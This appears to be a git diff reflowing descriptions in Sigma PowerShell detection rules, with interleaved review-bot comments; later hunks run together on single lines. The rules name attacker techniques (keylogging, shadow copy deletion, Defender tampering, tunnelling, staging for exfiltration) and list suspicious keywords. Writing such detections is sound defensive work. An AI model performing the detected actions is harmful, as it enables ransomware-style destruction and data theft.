 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml
index 0d83662f8..98c5b422b 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml
@@ -1,8 +1,7 @@
 title: Suspicious IO.FileStream
 id: 70ad982f-67c8-40e0-a955-b920c2fa05cb
 status: test
-description: Open a handle on the drive volume via the \\.\ DOS device path specifier
- and perform direct access read of the first few bytes of the volume.
+description: Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml
index 4590851da..b08f77519 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml
@@ -1,8 +1,7 @@
 title: Potential Keylogger Activity
 id: 965e2db9-eddb-4cf6-a986-7a967df651e4
 status: test
-description: Detects PowerShell scripts that contains reference to keystroke capturing
- functions
+description: Detects PowerShell scripts that contains reference to keystroke capturing functions
 references:
 - https://twitter.com/ScumBots/status/1610626724257046529
 - https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml
index 014a126e5..1ef5209cb 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml
@@ -1,8 +1,7 @@
 title: Potential Suspicious PowerShell Keywords
 id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
 status: test
-description: Detects potentially suspicious keywords that could indicate the use of
- a PowerShell exploitation framework
+description: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
 references:
 - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
 - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1
@@ -36,6 +35,9 @@ detection:
 - Runtime.InteropServices.DllImportAttribute
 - SuspendThread
 - rundll32
+ # - 'FromBase64'
+ # - 'Invoke-WMIMethod' # Prone to FP
+ # - 'http://127.0.0.1' # Prone to FP
 condition: ps_script and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml
index 2b1605ef8..65ac96d73 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml
@@ -1,15 +1,10 @@
 title: Suspicious Get Local Groups Information - PowerShell
 id: fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb
 status: test
-description: 'Adversaries may attempt to find local system groups and permission settings.
-
- The knowledge of local system permission groups can help adversaries determine
- which groups exist and which users belong to a particular group.
-
- Adversaries may use this information to determine which users have elevated permissions,
- such as the users found within the local administrators group.
-
- '
+description: |
+ Adversaries may attempt to find local system groups and permission settings.
+ The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+ Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml
index 95f6766f7..06c88f289 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml
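Review bot: The three commented-out keywords added after `- rundll32` leave the reader guessing why `'FromBase64'` is disabled, because only `'Invoke-WMIMethod'` and `'http://127.0.0.1'` carry the `# Prone to FP` marker. Either give it the same reason, `# - 'FromBase64' # Prone to FP (common in legitimate scripts)`, or, if it is a candidate still under evaluation, say so, `# - 'FromBase64' # TODO: evaluate FP rate before enabling`. Commented-out selector entries are easy to mistake for active ones in a list this long, so a single header comment such as `# Candidates kept out of the selection because of their false-positive rate:` above the three lines would make the block self-explaining. The `selection` list this hunk extends starts outside the hunk.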
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml
@@ -1,13 +1,9 @@
 title: Powershell Local Email Collection
 id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614
 status: test
-description: 'Adversaries may target user email on local systems to collect sensitive
- information.
-
- Files containing email data can be acquired from a users local system, such as
- Outlook storage or cache files.
-
- '
+description: |
+ Adversaries may target user email on local systems to collect sensitive information.
+ Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml
index b1ddb5fe8..46d0d9dff 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml
@@ -1,8 +1,7 @@
 title: Suspicious Mount-DiskImage
 id: 29e1c216-6408-489d-8a06-ee9d151ef819
 status: test
-description: Adversaries may abuse container files such as disk image (.iso, .vhd)
- file formats to deliver malicious payloads that may not be tagged with MOTW.
+description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image
 - https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml
index 0c0fc9cf5..5c87054c4 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml
@@ -1,9 +1,7 @@
 title: PowerShell Deleted Mounted Share
 id: 66a4d409-451b-4151-94f4-a55d559c49b0
 status: test
-description: Detects when when a mounted share is removed. Adversaries may remove
- share connections that are no longer useful in order to clean up traces of their
- operation
+description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
 author: oscd.community, @redcanary, Zach Stanford @svch0st
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml
index 68e5d63b7..492811eab 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml
@@ -1,13 +1,9 @@
 title: Suspicious Connection to Remote Account
 id: 1883444f-084b-419b-ac62-e0d0c5b3693f
 status: test
-description: 'Adversaries with no prior knowledge of legitimate credentials within
- the system or environment may guess passwords to attempt access to accounts.
-
- Without knowledge of the password for an account, an adversary may opt to systematically
- guess the password using a repetitive or iterative mechanism
-
- '
+description: |
+ Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.
+ Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml
index 375ea05e4..af588b90c 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml
@@ -1,8 +1,7 @@
 title: Suspicious New-PSDrive to Admin Share
 id: 1c563233-030e-4a07-af8c-ee0490a66d3a
 status: test
-description: Adversaries may use to interact with a remote network share using Server
- Message Block (SMB). The adversary may then perform actions as the logged-on user.
+description: Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml
index a73cc8f63..0b94e7b37 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml
@@ -1,8 +1,7 @@
 title: Suspicious TCP Tunnel Via PowerShell Script
 id: bd33d2aa-497e-4651-9893-5c5364646595
 status: test
-description: Detects powershell scripts that creates sockets/listeners which could
- be indicative of tunneling activity
+description: Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity
 references:
 - https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml
index d8b997661..90a561d8c 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml
@@ -1,8 +1,7 @@
 title: Recon Information for Export with PowerShell
 id: a9723fcc-881c-424c-8709-fd61442ab3c3
 status: test
-description: Once established within a system or network, an adversary may use automated
- techniques for collecting internal data
+description: Once established within a system or network, an adversary may use automated techniques for collecting internal data
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml
index 871919869..8827039ad 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml
@@ -1,13 +1,9 @@
 title: Remove Account From Domain Admin Group
 id: 48a45d45-8112-416b-8a67-46e03a4b2107
 status: test
-description: 'Adversaries may interrupt availability of system and network resources
- by inhibiting access to accounts utilized by legitimate users.
-
- Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove
- access to accounts.
-
- '
+description: |
+ Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.
+ Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml
index 419898223..ed789b49c 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml
@@ -1,12 +1,10 @@
 title: Suspicious Service DACL Modification Via Set-Service Cmdlet - PS
 id: 22d80745-6f2c-46da-826b-77adaededd74
 related:
- - id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac
- type: similar
+ - id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac
+ type: similar
 status: test
-description: Detects usage of the "Set-Service" powershell cmdlet to configure a new
- SecurityDescriptor that allows a service to be hidden from other utilities such
- as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
+description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
 references:
 - https://twitter.com/Alh4zr3d/status/1580925761996828672
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml
index 255b40610..f9ddde3b5 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml
@@ -1,11 +1,10 @@
 title: Potential PowerShell Obfuscation Using Alias Cmdlets
 id: 96cd126d-f970-49c4-848a-da3a09f55c55
 related:
- - id: e8314f79-564d-4f79-bc13-fbc0bf2660d8
- type: derived
+ - id: e8314f79-564d-4f79-bc13-fbc0bf2660d8
+ type: derived
 status: test
-description: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean
- to obfuscate PowerShell scripts
+description: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
 references:
 - https://github.com/1337Rin/Swag-PSO
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml
index 8966e7606..a0f4f7965 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml
@@ -1,16 +1,10 @@
 title: Suspicious Get Information for SMB Share
 id: 95f0643a-ed40-467c-806b-aac9542ec5ab
 status: test
-description: 'Adversaries may look for folders and drives shared on remote systems
- as a means of identifying sources of information to gather as
-
- a precursor for Collection and to identify potential systems of interest for Lateral
- Movement.
-
- Networks often contain shared network drives and folders that enable users to
- access file directories on various systems across a network.
-
- '
+description: |
+ Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as
+ a precursor for Collection and to identify potential systems of interest for Lateral Movement.
+ Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml
index a84782d23..45458f4ff 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml
@@ -1,9 +1,7 @@
 title: Suspicious SSL Connection
 id: 195626f3-5f1b-4403-93b7-e6cfd4d6a078
 status: test
-description: Adversaries may employ a known encryption algorithm to conceal command
- and control traffic rather than relying on any inherent protections provided by
- a communication protocol.
+description: Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2
 - https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml
index 8c3412ea6..9a033cf3a 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml
@@ -1,8 +1,7 @@ title: Suspicious Unblock-File id: 5947497f-1aa4-41dd-9693-c9848d58727d status: test -description: Remove the Zone.Identifier alternate data stream which identifies the - file as downloaded from the internet. +description: Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml index 7b9460690..6c39ac370 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml @@ -1,13 +1,9 @@ title: Replace Desktop Wallpaper by Powershell id: c5ac6a1e-9407-45f5-a0ce-ca9a0806a287 status: test -description: 'An adversary may deface systems internal to an organization in an attempt - to intimidate or mislead users. - - This may take the form of modifications to internal websites, or directly to user - systems with the replacement of the desktop wallpaper - - ' +description: | + An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. + This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md author: frack113 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml index a49f0f5ef..1b707817d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml @@ -1,8 +1,7 @@ title: Powershell Suspicious Win32_PnPEntity id: b26647de-4feb-4283-af6b-6117661283c5 status: test -description: Adversaries may attempt to gather information about attached peripheral - devices and components connected to a computer system. +description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml index 98bedc6d0..5ccd8c3f5 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml @@ -1,8 +1,7 @@ title: Delete Volume Shadow Copies via WMI with PowerShell - PS Script id: e17121b4-ef2a-4418-8a59-12fb1631fa9e status: test -description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. - This technique is used by numerous ransomware families such as Sodinokibi/REvil +description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml index 8c3c0ab44..daba3895e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml @@ -1,14 +1,12 @@ title: Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script id: c1337eb8-921a-4b59-855b-4ba188ddcc42 related: - - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e - type: derived - - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 - type: similar + - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e + type: derived + - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 + type: similar status: test -description: Detects deletion of Windows Volume Shadow Copies with PowerShell code - and Get-WMIObject. This technique is used by numerous ransomware families such - as Sodinokibi/REvil +description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml index 163b91f7f..b1df50bec 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml 
@@ -1,13 +1,9 @@ title: Suspicious PowerShell WindowStyle Option id: 313fbb0a-a341-4682-848d-6d6f8c4fab7c status: test -description: 'Adversaries may use hidden windows to conceal malicious activity from - the plain sight of users. - - In some cases, windows that would typically be displayed when an application carries - out an operation can be hidden - - ' +description: | + Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. + In some cases, windows that would typically be displayed when an application carries out an operation can be hidden references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md author: frack113, Tim Shelton (fp AWS) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml index 0f7c1f689..3fb8b013e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml @@ -1,9 +1,7 @@ title: PowerShell Write-EventLog Usage id: 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e status: test -description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The - cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve - them later for later use +description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use references: - https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/ author: Nasreddine Bencherchali (Nextron Systems) 
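Review bot: The rewritten description in the Write-EventLog hunk keeps two wording defects from the old side: `levreage` should be `leveraged`, and `retrieve them later for later use` repeats itself. A corrected single line would be `description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be leveraged to write malicious payloads to the EventLog and retrieve them later`. The WindowStyle hunk on this line only reflows text and needs no change.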
@@ -26,7 +24,6 @@ detection: - '-RawData ' condition: ps_script and selection falsepositives: - - Legitimate applications writing events via this cmdlet. Investigate alerts to - determine if the action is benign + - Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml index d2f203634..5b3fc5da1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml 
@@ -1,22 +1,16 @@ title: Zip A Folder With PowerShell For Staging In Temp - PowerShell Script -id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 +id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml b/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml index 103e5fe21..66f58eb2f 100644 
--- a/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml @@ -1,16 +1,15 @@ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: dddfebae-c46f-439c-af7a-fdb6bde90218 related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: derived - - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 - type: derived + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived status: test -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/12/25 tags: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml index 90af3568f..54cd2e4d8 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml 
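Review bot: The reflowed line `which usually utilized by adversaries to bypass PowerShell execution restrictions` is missing a verb; `which is usually utilized by adversaries` fixes it without changing the claim. The author line now carries the literal `Ş` instead of the `\u015E` escape, which is valid YAML only when the file is stored as UTF-8 — presumably the generator guarantees that, but it is worth confirming since the old quoted form was encoding-agnostic.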
@@ -1,11 +1,10 @@ title: Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging id: ae2bdd58-0681-48ac-be7f-58ab4e593458 related: - - id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 - type: similar + - id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 + type: similar status: test -description: Detects attempts to remove Windows Defender configuration using the 'MpPreference' - cmdlet +description: Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml index b57a4f5c1..ff2700e55 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml 
